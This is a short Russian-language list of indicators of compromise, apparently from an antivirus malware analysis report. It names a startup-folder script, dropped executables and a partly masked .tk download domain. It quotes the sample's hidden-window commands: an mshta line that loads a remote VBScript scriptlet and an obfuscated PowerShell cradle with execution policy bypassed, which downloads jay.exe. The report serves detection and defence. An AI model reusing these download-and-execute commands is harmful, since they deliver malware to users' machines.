Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.js
- http://pr#####oeletrozema.tk/ja/jay.exe
- '<SYSTEM32>\mshta.exe' VBScRiPT:cLOSe (GEtobjECt ("scRiPt:http://pr#####oeletrozema.tk/ja/jt") )
- %WINDIR%\syswow64\svchost.exe
- %APPDATA%\bypaxx.exe
- http://pr#####oeletrozema.tk/ja/jt
- http://pr#####oeletrozema.tk/ja/jay.exe
- DNS ASK pr#####oeletrozema.tk
- '%APPDATA%\bypaxx.exe'
- '<SYSTEM32>\cmd.exe' "/c PoWERShell.eXE -Ex BYpASS -nOp -W 1 seT-ConTENt -va ( nEW-ObJecT nEt.WeBCLiENT ).DOwNLOaddaTa( 'http://pr#####oeletrozema.tk/ja/jay.exe' ) -eN bYTE -PAtH '...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' VBScRiPT:cLOSe (GEtobjECt ("scRiPt:http://pr#####oeletrozema.tk/ja/jt") )' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' "/c PoWERShell.eXE -Ex BYpASS -nOp -W 1 seT-ConTENt -va ( nEW-ObJecT nEt.WeBCLiENT ).DOwNLOaddaTa( 'http://pr#####oeletrozema.tk/ja/jay.exe' ) -eN bYTE -PAtH '...
- '%WINDIR%\syswow64\svchost.exe'